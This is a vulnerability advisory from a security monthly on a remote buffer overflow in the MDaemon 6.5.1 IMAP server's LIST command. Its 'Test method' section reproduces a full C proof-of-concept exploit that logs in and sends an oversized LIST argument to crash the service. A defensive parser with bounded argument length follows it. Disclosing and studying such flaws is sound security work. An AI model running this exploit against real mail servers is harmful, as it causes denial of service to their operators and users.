NSFOCUS Security Monthly, Issue 52: Latest Vulnerabilities

MDaemon IMAP Server LIST Command Remote Buffer Overflow Vulnerability

Date: 2004-10-10

Published: 2004-09-22
Updated: 2004-09-24

Affected systems:
Alt-N MDaemon 6.5.1

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 11238

Alt-N MDaemon is a Windows-based mail server.

The MDaemon IMAP service does not correctly check the buffer length when handling the LIST command. A remote attacker can exploit this to overflow a buffer in the service and possibly execute arbitrary instructions with the privileges of the service process.

Specifically, the IMAP service mishandles the LIST command: submitting an overlong argument overflows the buffer and crashes the program, and carefully constructed data may allow arbitrary instructions to be executed with the privileges of the process.

<*Source: pigrelax (pigrelax@yandex.ru)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109591179510781&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

pigrelax (pigrelax@yandex.ru) provided the following test method:

/////////////////////////////////////////////////////////////
//            Remote proof-of-concept exploit              //
//                         for                             //
//               Mdaemon IMAP server v6.5.1                //
//                       and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.                      //
//                    Author: D_BuG.                       //
//                     D_BuG@bk.ru                         //                
//                   Data: 16/09/2004                      //
//                     NOT PUBLIC!                         //
//                                                         //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strstr, memset */
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_pton, htons */

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
{
    printf("Remote proof-of-concept(buffer overflow) exploit\n");
    printf("                         for                              \n");
    printf("Mdaemon IMAP server v6.5.1 and possible other version.\n");
    if(argc!=3)
    {
        printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);
        printf("e.g.:%s 192.168.1.1 143\n",argv[0]);
        exit(-1);
    }

    /* Build the target address from the command-line arguments */
    sa.sin_family=AF_INET;
    sa.sin_port=htons(atoi(argv[2]));
    if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
    {
        printf("Error inet_pton\n");
        exit(-1);
    }

    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

    printf("[~]Connecting...\n");

    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
    {
        printf("[-]Connect failed....\nExit...\n");
        exit(-1);
    }


char send[]="0001 LOGIN ""test"" ""console""\r\n";
char send3[]=
"007x LIST "
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaAAAA""" """ \
*BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAc" \
"" "\r\n\r\n";
/* Response buffer; zeroed before each read so strstr() always sees a
   NUL-terminated string */
char rcv[1024];

    printf("[+]Ok!\n");
    sleep(2);
    printf("[~]Get banner...\n");
    memset(rcv,0,sizeof(rcv));
    /* Read at most sizeof(rcv)-1 bytes to keep the terminating NUL */
    if(read(sock,rcv,sizeof(rcv)-1) !=-1){}

    if(strstr(rcv,"IMAP")==NULL)
    {
        printf("[-]Failed!\n");
    }
    else
    {
        printf("[+]Ok!\n");
    }

    /* Authenticate first: the LIST command is only accepted after LOGIN */
    printf("[~]Send LOGIN and PASSWORD...\n");
    write(sock,send,sizeof(send)-1);
    sleep(2);
    memset(rcv,0,sizeof(rcv));
    if(read(sock,rcv,sizeof(rcv)-1) !=-1){}

    if(strstr(rcv,"OK")==NULL)
    {
        printf("[-]Failed login or password...\nExit...");
        exit(-1);
    }

    printf("[+]Ok!\n");

    /* Send the overlong LIST argument that triggers the overflow */
    printf("[~]Send LIST...\n");
    write(sock,send3,sizeof(send3)-1);
    sleep(2);
    memset(rcv,0,sizeof(rcv));
    if(read(sock,rcv,sizeof(rcv)-1) !=-1){}

    if(strstr(rcv,"BAD")!=NULL)
    {
        printf("[-]Exploit failed...please check your version Mdaemon!\n");
        printf("[-]Exit...\n");
        exit(-1);
    }
    printf("[+]Ok!\n");
    printf("[+]Crash service.....\n");
    printf("[~]Done.\n");

    close(sock);

    return 0;
}
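
As an added example, which is neither MDaemon's code nor part of the proof of concept above, the following shows the check the advisory describes as missing: an IMAP LIST line parser that enforces a maximum argument length before copying into a fixed-size buffer, rejecting an oversized argument instead of overflowing. The limit IMAP_MAX_ARG, the struct and function names, and the sample lines are assumptions constructed for this example. The same parser doubles as a crude check over captured IMAP traffic or session logs: a LIST whose argument exceeds the bound returns LIST_TOO_LONG.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed per-argument bound for this example. A real server chooses its
 * own limit; the point is that a limit exists and is enforced before the
 * copy, not after. */
#define IMAP_MAX_ARG 256

enum list_status { LIST_OK = 0, LIST_BAD_SYNTAX = 1, LIST_TOO_LONG = 2 };

struct list_cmd {
    char tag[32];
    char reference[IMAP_MAX_ARG + 1];
    char mailbox[IMAP_MAX_ARG + 1];
};

/* Copy the next argument (quoted string or bare atom) from *p into out.
 * Returns the argument length, -1 on a syntax error, -2 if it would not
 * fit in cap-1 bytes. Rejecting rather than silently truncating keeps the
 * remainder of the line from being misread as the next argument. */
static int take_arg(const char **p, char *out, size_t cap)
{
    const char *s = *p;
    size_t n = 0;
    int quoted;

    while (*s == ' ')
        s++;
    quoted = (*s == '"');
    if (quoted)
        s++;
    while (*s && *s != '\r' && *s != '\n' && (quoted ? *s != '"' : *s != ' ')) {
        if (n + 1 >= cap)
            return -2;              /* over the bound: stop before writing */
        out[n++] = *s++;
    }
    if (quoted) {
        if (*s != '"')
            return -1;              /* unterminated quoted string */
        s++;
    } else if (n == 0) {
        return -1;                  /* missing argument */
    }
    out[n] = '\0';
    *p = s;
    return (int)n;
}

/* Case-insensitive compare of a parsed verb against an upper-case keyword. */
static int is_verb(const char *v, const char *want)
{
    for (; *v && *want; v++, want++)
        if (toupper((unsigned char)*v) != *want)
            return 0;
    return *v == '\0' && *want == '\0';
}

/* Parse "tag LIST reference mailbox CRLF", length-checking every argument.
 * Returns one of list_status. */
int parse_list(const char *line, struct list_cmd *cmd)
{
    const char *p = line;
    char verb[8];
    int r;

    memset(cmd, 0, sizeof *cmd);
    r = take_arg(&p, cmd->tag, sizeof cmd->tag);
    if (r < 0)
        return r == -2 ? LIST_TOO_LONG : LIST_BAD_SYNTAX;
    r = take_arg(&p, verb, sizeof verb);
    if (r < 0 || !is_verb(verb, "LIST"))
        return LIST_BAD_SYNTAX;
    r = take_arg(&p, cmd->reference, sizeof cmd->reference);
    if (r < 0)
        return r == -2 ? LIST_TOO_LONG : LIST_BAD_SYNTAX;
    r = take_arg(&p, cmd->mailbox, sizeof cmd->mailbox);
    if (r < 0)
        return r == -2 ? LIST_TOO_LONG : LIST_BAD_SYNTAX;
    while (*p == ' ')
        p++;
    if (*p != '\0' && strcmp(p, "\r\n") != 0)
        return LIST_BAD_SYNTAX;     /* trailing garbage after the mailbox */
    return LIST_OK;
}

/* Constructed sample: an ordinary client LIST; expected to parse cleanly. */
int check_benign(void)
{
    struct list_cmd c;
    int st = parse_list("a001 LIST \"\" \"INBOX\"\r\n", &c);
    return st == LIST_OK && strcmp(c.mailbox, "INBOX") == 0 && c.reference[0] == '\0';
}

/* Constructed sample shaped like the advisory's trigger: a LIST whose
 * reference argument (900 bytes) is far longer than any mailbox name. */
int check_oversized(void)
{
    static char line[1100];
    struct list_cmd c;
    size_t n = (size_t)snprintf(line, sizeof line, "007x LIST \"");
    memset(line + n, 'a', 900);
    n += 900;
    snprintf(line + n, sizeof line - n, "\" *\r\n");
    return parse_list(line, &c) == LIST_TOO_LONG;
}

int main(void)
{
    printf("benign LIST accepted:    %s\n", check_benign() ? "yes" : "no");
    printf("oversized LIST rejected: %s\n", check_oversized() ? "yes" : "no");
    return 0;
}
```

The design choice worth noting is that take_arg fails before writing the byte that would exceed the buffer, so the caller can answer the client with a BAD response and drop the line; a parser that copies first and checks afterwards has already overwritten whatever sat beyond the buffer, which is the condition the advisory describes.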

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Alt-N
-----
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.altn.com